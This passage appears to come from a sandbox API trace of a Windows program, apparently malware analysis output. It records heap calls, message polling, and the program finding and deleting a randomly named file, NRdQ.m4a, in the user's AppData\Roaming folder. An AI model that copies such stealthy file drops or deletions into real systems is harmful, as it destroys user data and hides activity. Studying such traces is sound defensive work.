returned 0 [0235.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0235.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0235.438] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0235.438] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0235.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0235.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0235.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0235.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0235.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0235.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0235.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0235.439] CloseHandle (hObject=0x2d0) returned 1 [0235.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0235.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0235.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0235.443] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0235.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0235.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0235.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0235.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0235.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0235.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f68 [0235.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0235.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0235.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0235.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0235.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0235.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0235.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0235.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0235.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0235.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0235.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0235.444] CloseHandle (hObject=0x2a0) returned 1 [0235.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0235.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0235.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0235.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0235.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0235.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0235.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0235.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0235.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0235.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0235.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0235.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0235.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0235.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0235.450] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0235.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0235.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0235.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0235.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0235.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0235.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0235.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0235.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0235.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0235.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0235.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0235.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0235.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0235.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0235.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0235.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0235.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee7a58 | out: hHeap=0x970000) returned 1 [0235.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0235.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0235.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0235.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0235.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0235.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0235.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0235.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0235.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0235.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0235.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0235.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0235.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0235.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0235.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0235.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0235.462] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0235.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0235.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0235.462] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0235.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0235.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0235.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0235.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0235.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0235.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0235.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0235.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0235.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0235.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0235.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0235.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0235.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0235.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0235.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0235.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0235.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e564e0 [0235.463] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/NRdQ.m4a", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\NRdQ.m4a", lpFilePart=0x8cedf4*="NRdQ.m4a") returned 0x28 [0235.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0235.463] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NRdQ.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nrdq.m4a")) returned 0x20 [0235.463] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NRdQ.m4a", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117382d0, ftCreationTime.dwHighDateTime=0x1d5ec96, ftLastAccessTime.dwLowDateTime=0xce495400, ftLastAccessTime.dwHighDateTime=0x1d5ef72, ftLastWriteTime.dwLowDateTime=0xce495400, ftLastWriteTime.dwHighDateTime=0x1d5ef72, nFileSizeHigh=0x0, nFileSizeLow=0x14af9, dwReserved0=0x1, dwReserved1=0x1c, cFileName="NRdQ.m4a", cAlternateFileName="")) returned 0xa87250 [0235.463] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NRdQ.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nrdq.m4a")) returned 1 [0235.619] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117382d0, ftCreationTime.dwHighDateTime=0x1d5ec96, ftLastAccessTime.dwLowDateTime=0xce495400, ftLastAccessTime.dwHighDateTime=0x1d5ef72, ftLastWriteTime.dwLowDateTime=0xce495400, ftLastWriteTime.dwHighDateTime=0x1d5ef72, nFileSizeHigh=0x0, nFileSizeLow=0x14af9, dwReserved0=0x1, dwReserved1=0x1c, cFileName="NRdQ.m4a", cAlternateFileName="")) returned 0 [0235.619] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0235.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0235.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0235.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0235.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0235.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0235.620] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0235.620] TranslateMessage (lpMsg=0x8cf968) returned 0 [0235.620] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0235.620] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0235.620] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0235.620] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0235.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0235.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0235.620] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0235.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0235.620] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0235.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0235.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0235.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0235.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0235.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0235.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0235.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0235.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0235.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0235.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0235.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0235.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0235.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0235.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0235.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0235.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0235.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0235.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x52) returned 0x2e564e0 [0235.621] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/NRdQ.m4a", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\NRdQ.m4a", lpFilePart=0x8cf650*="NRdQ.m4a") returned 0x28 [0235.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0235.621] GetFileAttributesW 